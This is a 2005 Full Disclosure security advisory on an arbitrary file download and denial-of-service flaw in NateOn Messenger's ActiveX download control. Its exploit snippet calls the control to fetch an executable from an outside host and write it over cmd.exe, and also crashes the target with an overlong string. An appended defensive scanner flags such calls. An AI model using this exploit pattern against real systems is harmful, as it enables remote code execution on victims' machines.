Full Disclosure mailing list archives
[NRVA05-08] - Arbitrary file download by NateOn Messenger's ActiveX and DoS
From: "saintlinu" <saintlinu () yahoo co kr>
Date: Thu, 29 Sep 2005 11:36:27 +0800
Title: Arbitrary File Download by NateOn Messenger's ActiveX and DoS
Discoverer: PARK, GYU TAE (saintlinu () null2root org)
Advisory No.: NRVA05-08
Critical: Moderately Critical
Impact: Arbitrary file download by NateOn Messenger's ActiveX and DoS
Where: From remote
Operating System: Windows Only
Solution: Not patched yet
Workaround: N / A

Notice:
09. 17. 2005 Initially notified
09. 23. 2005 2nd notified
09. 27. 2005 3rd notified
09. 29. 2005 Vendor didn't respond. Vulnerability disclosed

Description:
The NateOn Messenger (see NRVA05-02) is an Internet Instant Messenger such as MSN, YAHOO and so on.
If NateOn Messenger is installed, it can be exploited through the 'NateonDownloadManager.ocx' ActiveX, and there is another vulnerability like a Buffer Overflow.

See the following detailed description:
NOT INCLUDED HERE BUT A PIECE OF CODE

<--snip-->
i = GotNate.IsNateonInstall();
if( i == 1 ) {
    alert('NateOn Messenger already installed. Do Attack ...');
    // if you want to second order attack then try
    i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\system32\\cmd.exe');
    // if you want to crash the victim system then try
    i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_strings_in_here');
} else {
    alert('NateOn Messenger NOT Installed');
}
</--snip-->
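An added example, not part of the original advisory: a static check that a proxy, crawler or mail gateway could run over page script to flag calls to the control's `Excute` method. It assumes the third argument is the local destination path, as the snippet suggests; the 260-character threshold, the function names and the sample input are constructed for illustration.

```javascript
// Added example: flags page script that calls the control's Excute method.
// Assumption: the third argument is the local destination path.
const MAX_PATH = 260; // Windows MAX_PATH, used as an assumed "overlong" threshold

// Reads consecutive quoted string arguments starting at src[start].
// A backslash escape is reduced to the escaped character, which is
// sufficient for the path checks below.
function parseStringArgs(src, start) {
  const args = [];
  let i = start;
  while (i < src.length) {
    while (/\s|,/.test(src[i] || "")) i++;
    const q = src[i];
    if (q !== '"' && q !== "'") break; // ')' or a non-literal argument
    let val = "";
    for (i++; i < src.length && src[i] !== q; i++) {
      if (src[i] === "\\" && i + 1 < src.length) i++;
      val += src[i];
    }
    i++; // step past the closing quote
    args.push(val);
  }
  return args;
}

// Returns one finding per Excute(...) call, with the reasons it is suspicious.
function scanForExcute(src) {
  const findings = [];
  const re = /\.Excute\s*\(/g;
  while (re.exec(src) !== null) {
    const [, url = "", dest = ""] = parseStringArgs(src, re.lastIndex);
    const reasons = [];
    if (/^https?:\/\//i.test(url)) reasons.push("remote-source");
    if (/^[a-z]:\\/i.test(dest) || dest.startsWith("\\\\")) {
      reasons.push("absolute-destination");
    }
    if (dest.length > MAX_PATH) reasons.push("overlong-destination");
    findings.push({ url, destLength: dest.length, reasons });
  }
  return findings;
}

// Constructed sample page script (not taken from the advisory).
const SAMPLE = [
  "i = ctl.Excute('1','http://example.invalid/a.exe','c:\\\\windows\\\\system32\\\\a.exe');",
  "i = ctl.Excute(\"1\",'http://example.invalid/a.exe','" + "A".repeat(300) + "');",
  "i = ctl.IsNateonInstall();",
].join("\n");

console.log(JSON.stringify(scanForExcute(SAMPLE), null, 2));
```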